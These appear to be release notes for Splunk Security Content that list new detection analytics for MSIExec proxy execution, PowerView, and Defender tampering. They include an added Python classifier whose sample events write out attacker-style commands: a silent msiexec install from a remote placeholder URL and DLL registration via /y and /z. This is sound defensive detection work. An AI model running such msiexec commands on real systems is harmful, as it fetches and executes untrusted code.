New Analytic Story
- Windows System Binary Proxy Execution MSIExec
New Analytics
- Potential password in username (Thanks to @mbjerkeland from Splunk)
- PowerView SPN Discovery
- PowerView Kerberos Ticket Request
- Windows Impair Defense Delete Win Defender Context Menu
- Windows Impair Defense Delete Win Defender Profile Registry
- Windows Impair Defenses Disable Win Defender Auto Logging
- Windows MSIExec DLLRegisterServer
- Windows MSIExec Remote Download
- Windows MSIExec Spawn Discovery Command
- Windows MSIExec Unregister DLLRegisterServer
- Windows MSIExec With Network Connections
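The four MSIExec command-line analytics listed above (Remote Download, DLLRegisterServer, Unregister DLLRegisterServer, Spawn Discovery Command) all key on process-creation telemetry. The following is an added example, not Splunk's detection logic or any content from this release: a small stand-alone classifier that applies the same heuristics to constructed process events, so the triggering conditions can be checked offline. Field names (parent_process_name, process_name, process) and the sample events are assumptions modelled loosely on the Endpoint.Processes data model; "Windows MSIExec With Network Connections" needs network events and is not covered here.

```python
"""
Added example: MSIExec system-binary-proxy-execution heuristics run over
constructed process-creation events. Not part of Splunk Security Content.
Field names are assumptions loosely modelled on Endpoint.Processes.
"""
import re
from dataclasses import dataclass

# Child processes commonly used for host/domain discovery (assumed list).
DISCOVERY_CHILDREN = {
    "whoami.exe", "net.exe", "net1.exe", "ipconfig.exe", "systeminfo.exe",
    "nltest.exe", "tasklist.exe", "hostname.exe", "arp.exe", "netstat.exe",
}

# msiexec /i http(s)://... installs a package fetched from a remote host.
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# msiexec /y <dll> calls DllRegisterServer; /z calls DllUnregisterServer.
REGISTER_RE = re.compile(r"(?:^|\s)[/-]y\b", re.IGNORECASE)
UNREGISTER_RE = re.compile(r"(?:^|\s)[/-]z\b", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_process_name: str
    process_name: str
    process: str  # full command line of the new process


def classify(ev: ProcessEvent) -> list[str]:
    """Return the MSIExec heuristics a single event satisfies (possibly none)."""
    hits = []
    parent = ev.parent_process_name.lower()
    child = ev.process_name.lower()
    cmd = ev.process
    if child == "msiexec.exe":
        if URL_RE.search(cmd):
            hits.append("msiexec_remote_download")
        if REGISTER_RE.search(cmd):
            hits.append("msiexec_dllregisterserver")
        if UNREGISTER_RE.search(cmd):
            hits.append("msiexec_unregister_dllregisterserver")
    if parent == "msiexec.exe" and child in DISCOVERY_CHILDREN:
        hits.append("msiexec_spawn_discovery_command")
    return hits


def run_detections(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event index -> hits, for events that match at least one heuristic."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


def sample_events() -> list[ProcessEvent]:
    """Constructed events; the hostname and paths are made up for the example."""
    return [
        ProcessEvent("explorer.exe", "msiexec.exe",
                     "msiexec.exe /q /i http://updates.example.invalid/u.msi"),
        ProcessEvent("cmd.exe", "msiexec.exe",
                     r"msiexec.exe /y C:\Users\Public\helper.dll"),
        ProcessEvent("cmd.exe", "msiexec.exe",
                     r"msiexec.exe /Z C:\Users\Public\helper.dll"),
        ProcessEvent("msiexec.exe", "whoami.exe", "whoami.exe /all"),
        # Benign: local package, quiet install, no register/unregister switch.
        ProcessEvent("services.exe", "msiexec.exe",
                     r"msiexec.exe /i C:\installers\app.msi /qn"),
        # Benign: msiexec routinely hosts a console window.
        ProcessEvent("msiexec.exe", "conhost.exe", "conhost.exe 0x4"),
    ]


if __name__ == "__main__":
    for idx, hits in run_detections(sample_events()).items():
        print(idx, hits)
```

Because /y and /z point at a DLL rather than an MSI, a hit on either is worth reviewing even when the path looks benign; the remote-download rule should be tuned against software-deployment tooling in your environment that legitimately installs from HTTP(S).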
Updated Analytics
- Outbound Network Connection from Java Using Default Ports
- Rundll32 LockWorkStation
- Splunk Command and Scripting Interpreter Risky Commands (released in v3.43.1)
BA Updates
- Deprecated 3 complex BA and test files
Other Updates
- Tagged detections with the correct data models
- Improvements to the automated detection testing framework
- Several key updates to the contentctl project code: optimizations, improved error handling, and the GitHub Actions workflow in our CI/CD